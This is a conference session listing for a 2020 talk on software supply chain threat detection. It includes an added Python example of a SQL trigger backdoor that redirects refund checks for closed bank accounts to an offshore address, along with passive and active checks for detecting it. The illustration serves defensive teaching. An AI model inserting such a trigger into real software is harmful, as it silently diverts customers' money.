Saturday, March 28 • 2:00pm - 2:30pm
Software Supply Chain Threat Detection




Scenario: XYZ Bank recently received complaints from customers who had closed their online account and never received the check for their remaining balance. XYZ Bank found a SQL backdoor that altered the mailing address of closed accounts to a suspicious offshore address. The escalation that followed raised these concerns among XYZ InfoSec, XYZ IT, and the software consultants who developed the online banking application:
• How many customers were impacted?
• The SOC team had confirmed that external network traffic did not install this backdoor. Where, then, did it come from?
• How many people had access to the source code repositories?
• What other code might have been backdoored?
Global organizations commonly use an onsite-offshore delivery model, in which software development teams are outsourced to various parts of the world, including countries known for active cyber offenses or for working conditions that leave knowledge workers bitter and disgruntled.
To check for security issues, these organizations perform static analysis, code review, dynamic analysis, and penetration testing, among other techniques. These techniques discover coding defects such as buffer overflows and cross-site scripting, but they cannot typically find malicious code such as backdoors and logic bombs: such code is syntactically ordinary and does exactly what its author intended.
In a production enterprise environment, the security operations team monitors for external threats, primarily network attacks, malware, and ransomware. Its tooling is informed by threat intelligence feeds designed to detect the patterns of global external attackers, not threats originating inside the enterprise or inside the code the enterprise ships.
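To make the scenario concrete, the following is an added example (not code from the talk or from XYZ Bank) of a SQL backdoor of the kind described above, together with the two kinds of check a supply-chain threat detection effort would run against it: a passive check that inspects stored database logic for suspicious constructs, and an active check that reconciles account state against what customers actually supplied, which also answers "how many customers were impacted?". The table names, trigger text, sample customers and offshore address are all constructed for illustration. Note that the backdoor contains no injection, overflow or XSS defect for a conventional scanner to object to.

```python
"""Added example: a SQL backdoor of the kind in the scenario, next to two
detection checks. Everything here (table names, the trigger text, the sample
customers and the offshore address) is constructed for illustration; it is
not code from the talk or from XYZ Bank."""
import re
import sqlite3

# Constructed offshore address the backdoor redirects refund checks to.
OFFSHORE_ADDRESS = "PO Box 4471, Road Town, Tortola, VG1110"

SCHEMA = """
CREATE TABLE accounts (
    id INTEGER PRIMARY KEY,
    status TEXT NOT NULL,            -- 'OPEN' or 'CLOSED'
    mailing_address TEXT NOT NULL
);
-- Customer-supplied address changes, written by the web tier, never by SQL logic.
CREATE TABLE address_history (
    account_id INTEGER NOT NULL,
    mailing_address TEXT NOT NULL,
    changed_by TEXT NOT NULL,        -- 'customer' or 'staff'
    seq INTEGER NOT NULL
);
"""

# The backdoor: syntactically ordinary DDL with nothing for a defect scanner
# to flag. It fires only when an account is closed and silently rewrites
# where the final check is mailed.
BACKDOOR_TRIGGER = f"""
CREATE TRIGGER trg_close_cleanup AFTER UPDATE OF status ON accounts
WHEN NEW.status = 'CLOSED'
BEGIN
    UPDATE accounts SET mailing_address = '{OFFSHORE_ADDRESS}' WHERE id = NEW.id;
END;
"""


def build_db(install_backdoor=True):
    """Create an in-memory bank database with constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    if install_backdoor:
        db.executescript(BACKDOOR_TRIGGER)
    customers = [
        (1, "12 Elm St, Marietta, GA"),
        (2, "900 Peachtree St, Atlanta, GA"),
        (3, "45 Main St, Kennesaw, GA"),
    ]
    for cid, addr in customers:
        db.execute("INSERT INTO accounts VALUES (?, 'OPEN', ?)", (cid, addr))
        db.execute("INSERT INTO address_history VALUES (?, ?, 'customer', 1)",
                   (cid, addr))
    db.commit()
    return db


def close_account(db, account_id):
    """What the application does when a customer closes an account."""
    db.execute("UPDATE accounts SET status = 'CLOSED' WHERE id = ?", (account_id,))
    db.commit()


# --- Passive check: inspect stored SQL logic for suspicious constructs -------
# Heuristic: a customer-supplied column should never be assigned a string
# literal from inside database logic.
ADDR_LITERAL = re.compile(r"mailing_address\s*=\s*'[^']+'", re.IGNORECASE)


def suspicious_triggers(db):
    """Names of triggers that write a hard-coded literal into mailing_address."""
    rows = db.execute(
        "SELECT name, sql FROM sqlite_master WHERE type = 'trigger'").fetchall()
    return [name for name, sql in rows if ADDR_LITERAL.search(sql or "")]


# --- Active check: reconcile state against what the customer supplied --------
def impacted_accounts(db):
    """Closed accounts whose current mailing address differs from the last
    address the customer supplied. Answers 'how many customers were impacted?'."""
    rows = db.execute("""
        SELECT a.id
        FROM accounts a
        JOIN address_history h ON h.account_id = a.id
        WHERE a.status = 'CLOSED'
          AND h.seq = (SELECT MAX(seq) FROM address_history
                       WHERE account_id = a.id AND changed_by = 'customer')
          AND h.mailing_address <> a.mailing_address
        ORDER BY a.id
    """).fetchall()
    return [row[0] for row in rows]


def run_scenario():
    """Install the backdoor, close two accounts, run both checks."""
    db = build_db()
    close_account(db, 1)
    close_account(db, 3)
    return {
        "flagged_triggers": suspicious_triggers(db),
        "impacted": impacted_accounts(db),
        "address_of_1": db.execute(
            "SELECT mailing_address FROM accounts WHERE id = 1").fetchone()[0],
    }


if __name__ == "__main__":
    print(run_scenario())
```

The passive check is the kind of "point of interest" a repository sweep can look for without running anything: database logic, build scripts or application code that assigns a constant to a field only the customer should control. The active check needs a trustworthy record of customer intent (here the address history written by the web tier) and is what actually scopes the incident; without such a record, the count of impacted customers cannot be recovered from the database alone.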
This presentation provides insight into:
1. What is Software Supply Chain Threat Detection?
2. How is it different from other defect discovery methods?
3. Motive behind such threats in the software world
4. How is threat detection performed?
5. Points of interest to look for
6. Real world scenarios - backdoors, suspicious constructs
7. Outcome of Software Supply Chain Threat Detection - passive and active monitoring

Zoom link: https://zoom.us/j/266304316

Speakers
Diaspina Ghosh
Security Consultant, Synopsys
Diaspina Ghosh works as a Security Consultant at Synopsys, Inc. She has six years of experience in software security that includes penetration testing, source code review, business continuity planning and application risk ranking. Being a consultant, she also supports her clients...
Michael Doyle
Mike Doyle is a Principal Consultant for Synopsys and is an open source developer. He has served in previous roles as a commercial software developer, a security analyst, and a software security consultant. He has spoken at local, regional, and national conferences and has delivered...


Saturday March 28, 2020 2:00pm - 2:30pm EDT
'Connect' track, 3333 Busbee Dr NW, Kennesaw, GA 30144, USA